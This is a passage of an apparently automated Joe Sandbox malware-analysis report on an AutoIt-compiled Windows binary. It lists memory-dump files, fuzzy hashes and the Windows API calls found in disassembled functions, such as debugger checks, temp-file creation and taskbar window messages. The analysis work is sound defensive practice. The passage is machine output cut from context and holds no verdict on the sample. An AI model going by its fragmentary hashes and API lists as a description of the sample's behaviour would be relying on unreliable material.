                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d083a7a5bfc7961e4566bcc07c80c5f175d87606635abbf44fea7fdb17907aa1
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ECF0F4B5A40218B6CB04F3A4CC55FFF73B8EF06351F501919BA22A32C2DBA9580D82A4
                                                                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID: 2<r$j3y
                                                                                                                                                                                                                                                                              • API String ID: 0-3851994443
                                                                                                                                                                                                                                                                              • Opcode ID: 629124902f0b1b87e0bbeec91deaf6eb59b32d44d89d986eb98181d0830742aa
                                                                                                                                                                                                                                                                              • Instruction ID: 5e13e1619acc78059f481646f803229047b68cb3be74850ad6b0d73e3fbbc5c4
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 629124902f0b1b87e0bbeec91deaf6eb59b32d44d89d986eb98181d0830742aa
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25F09025104159AADB149B95D840AB973B9DB04711F10817ABC89C7690FA7C8F90D369
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006F24B0
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00788471
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0078847F
                                                                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: LongWindow
                                                                                                                                                                                                                                                                              • String ID: (|
                                                                                                                                                                                                                                                                              • API String ID: 1378638983-3772712737
                                                                                                                                                                                                                                                                              • Opcode ID: 170209c523f07cd6a5f537f246e8025ae9c954c14c43febdfe5bdf67365e0829
                                                                                                                                                                                                                                                                              • Instruction ID: b19023f262fe06d376211dc695e99bc6e0d8b90b3e03a2a49c8efdd558a6cd8f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 170209c523f07cd6a5f537f246e8025ae9c954c14c43febdfe5bdf67365e0829
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1F0A9322402459FC714EF68DC00D2A77A5EB8A320B60862DFA2AC73F1DB38A801DB10
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0075146F
                                                                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                                                                              • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                              • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                              • Opcode ID: e330517b2ae27dfec948b7e24295cfefd064008054c239b1ac0df0fdb962e125
                                                                                                                                                                                                                                                                              • Instruction ID: c9aaf9f1f186af17c54efd215b1e4de82c3479a85e72b8cfcd8cb0129009b7e5
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e330517b2ae27dfec948b7e24295cfefd064008054c239b1ac0df0fdb962e125
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13E0923228471C7AD3243798AC0BFC977858B04B61F11442AF748554C24EEE28D053D9
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 0070FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,007110E2,?,?,?,006F100A), ref: 0070FAD9
                                                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,006F100A), ref: 007110E6
                                                                                                                                                                                                                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,006F100A), ref: 007110F5
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 007110F0
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                              • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                              • Opcode ID: a3b07e906561c25c61298b07d929743bedf42870c359905e9ed6ac1fe41fc0dd
                                                                                                                                                                                                                                                                              • Instruction ID: f15360ad6e7d34ae1a404f7a0ff13492899f060ef8e55490bc2c660c9771d33f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3b07e906561c25c61298b07d929743bedf42870c359905e9ed6ac1fe41fc0dd
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8E06D706007518FD730AF28E808782BBF4BB04310F108D2DE986C6691DBBCE884CB91
APIs
• __Init_thread_footer.LIBCMT ref: 0070F151
Strings
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
Similarity
• API ID: Init_thread_footer
• String ID: `5|$h5|
• API String ID: 1385522511-3965277467
APIs
• GetTempPathW.KERNEL32(00000104,?,00000001), ref: 007639F0
• GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00763A05
Strings
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00782E08
• PostMessageW.USER32(00000000), ref: 00782E0F
  • Part of subcall function 0075F292: Sleep.KERNEL32 ref: 0075F30A
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00782DC8
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00782DDB
  • Part of subcall function 0075F292: Sleep.KERNEL32 ref: 0075F30A
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0072C213
• GetLastError.KERNEL32 ref: 0072C221
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0072C27C
Similarity
• API ID: ByteCharMultiWide$ErrorLast